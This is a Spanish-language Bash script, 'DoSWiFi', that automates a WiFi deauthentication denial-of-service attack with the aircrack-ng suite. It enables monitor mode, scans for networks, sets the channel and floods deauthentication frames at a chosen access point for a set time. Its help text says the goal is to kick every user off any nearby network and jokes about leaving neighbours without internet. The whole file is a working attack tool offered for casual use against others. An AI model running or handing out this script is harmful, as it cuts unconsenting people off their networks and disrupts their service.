#!/bin/bash
#DeautenticadorWiFi
resize -s 30 80 > /dev/null
BLUE="\e[1;96m"
BLUE2="\e[1;94m"
GREEN="\e[1;92m"
MORADO="\e[1;95m"
RED="\e[1;91m"
WHITE="\e[1;97m"





echo
echo
clear
echo -e "${WHITE}"
                                                                         figlet -c DoSWiFi                                                                

                             













echo -e "                                                              ${MORADO}by: yaxter"             
echo                                                                                                                                                               
echo -e "--------------------------------------------------------------------------------"
echo -e "|${BLUE}      EL MEJOR PROGRAMA PARA ${WHITE}EXPULSAR ${BLUE}A TODOS LOS USUARIOS DE UNA ${WHITE}RED WIFI${BLUE}    |"
echo -e "--------------------------------------------------------------------------------"
sleep "1"
echo
echo
echo -e " ${BLUE}SELECCIONE EL TIPO DE ATAQUE          "
echo
echo -e "${GREEN}"
opciones="AVANZADO SIMPLE AYUDA"
select opcion in $opciones
do
	if [[ $opcion = "AVANZADO" ]]; then			
echo
echo -e "${BLUE}"
sleep "1"		
echo -e "SELECCIONE SU TARJETA WIFI ${WHITE}(ejp: wlan1,wlan0)"
echo
echo -e "${WHITE}"
read -p "TARJETA WIFI: " a  
sudo airmon-ng check kill 
echo -e "${GREEN}Activando Modo Monitor"
sudo iwconfig $a mode monitor
echo
echo
sleep "1"
echo -e "${BLUE2}                           ESCANEANDO REDES WIFI                                                                "
echo
sleep "1"
echo -e "${BLUE}Presione ${WHITE}Ctrl+C ${BLUE}para detener el Escaneo"
sleep "1"
sudo airodump-ng $a
echo
echo -e "${GREEN}                             PREPARANDO ATAQUE                                                          "
sleep "1"
echo
echo -e "${BLUE}Escriba el ${WHITE}Canal ${BLUE}de la red que desea atacar                                            "
echo -e "${WHITE}"
read -p "Canal: " d
sudo iwconfig $a channel $d
sleep "1"
echo -e "${GREEN}LISTO"
sleep "1"
echo
echo -e "${BLUE2}CONECTANDO CON AIREPLAY-NG"
echo 
sudo aireplay-ng -9 $a 
echo 
echo -e "${BLUE}Para ${WHITE}EXPULSAR ${BLUE}a todos los usuarios de una red ${GREEN}Necesito ${BLUE}los siguientes Datos"
echo 
echo -e "${WHITE}"
read -p "DIRECCION MAC DE LA RED: " b 
echo 
read -p "DURACION DEL ATAQUE (seg): " c 
echo 
echo -e "${GREEN}Procesando información"
sleep "1"
echo
echo 
echo -e "${GREEN}EJECUTANDO EL ATAQUE"
echo
echo -e "${BLUE}Presione ${WHITE}Ctrl+C ${BLUE}si desea detener el ataque"
sleep "1"
echo -e "${GREEN}"
echo 
sudo aireplay-ng -0 $c -a $b $a
echo
echo 
elif [ $opcion = "SIMPLE" ]; then
echo
echo
sleep "1"	
echo -e "${BLUE}Para ${WHITE}EXPULSAR ${BLUE}a todos los usuarios de una red ${GREEN}Necesito ${BLUE}los siguientes Datos"
sleep "1"
echo -e "${WHITE}"
read -p "TARJETA WIFI (ejp: wlan1,wlan0): " a
echo -e "${WHITE}"
read -p "DIRECCION MAC DE LA RED: " b 
echo 
read -p "DURACION DEL ATAQUE (seg): " c 
echo 
echo -e "${GREEN}Procesando información"
echo
sleep "1.5"
echo 
echo -e "${GREEN}EJECUTANDO EL ATAQUE"
echo
echo -e "${BLUE}Presione ${WHITE}Ctrl+C ${BLUE}si desea detener el ataque"
sleep "1"
echo 
echo -e "${GREEN}"
sudo aireplay-ng -0 $c -a $b $a
echo
elif [ $opcion = "AYUDA" ]; then
echo
echo
echo
echo -e "           ${GREEN}¿COMO SE USA ESTE SCRIPT?"
echo
echo
echo -e "${WHITE}ESTE SCRIPT UTILIZA LA SUIT DE AIRCRACK PARA AUTOMATIZAR
DE MANERA CORRECTA LOS ATAQUES DE DEAUTENTICACION A REDES WIFI LOS CUALES
TIENEN COMO OBJETIVO EXPULSAR A TODOS LOS USUARIOS DE 
CUALQUIER RED WIFI A EXCEPCION DE LOS USUARIOS CONECTADOS MEDIANTE CABLE 
ETHERNET.


${GREEN}REQUISITOS DE ESTE SCRIPT:
${WHITE}
${BLUE}* ${WHITE}TENER INSTALADA LA SUITE DE ${BLUE}AIRCRACK-NG
* ${WHITE}TARJETA WIFI CON ${BLUE}MODO MONITOR ${WHITE}E ${BLUE}INYECCION DE PAQUETES ${WHITE}(INTERNA O USB)	



${GREEN}TIPOS DE ATAQUE 

${BLUE}AVANZADO: ${WHITE}CON ESTE ATAQUE PUEDES ATACAR A CUALQUIER RED WIFI DE TU
ALREDEDOR, ESTE ATAQUE TE PERMITE CAMBIAR DE CANAL TU TARJETA WIFI
DE MANERA CORRECTA ADEMAS DE ACTIVAR EL MODO MONITOR A TU TARJETA DE
RED SIN COMPLICACIONES.

${BLUE}SIMPLE: ${WHITE}ESTE ATAQUE SOLO LO PUEDES USAR SI TU TARJETA DE RED YA ESTA EN MODO
MONITOR Y SI LA RED WIFI A ATACAR TIENE EL MISMO CANAL QUE TU TARJETA WIFI 
ES DECIR QUE PUEDES ATACAR A VARIAS REDES WIFI AL MISMO TIEMPO
SIEMPRE Y CUANDO TENGAN EL MISMO CANAL. 
${BLUE}NOTA: ${WHITE}SI TIENE ALGUN ERROR EJECUTE EL ATAQUE ${BLUE}AVANZADO

${BLUE}ESPERO QUE ESTE SCRIPT TE SEA MUY UTIL Y TE DIVIERTAS DEJANDO SIN INTERNET 
A TUS VECINOS XD

CUALQUIER DUDA O PREGUNTA HAZMELA SABER EN MI CUENTA DE GITHUB: ${WHITE}yaxter"
fi 
done 
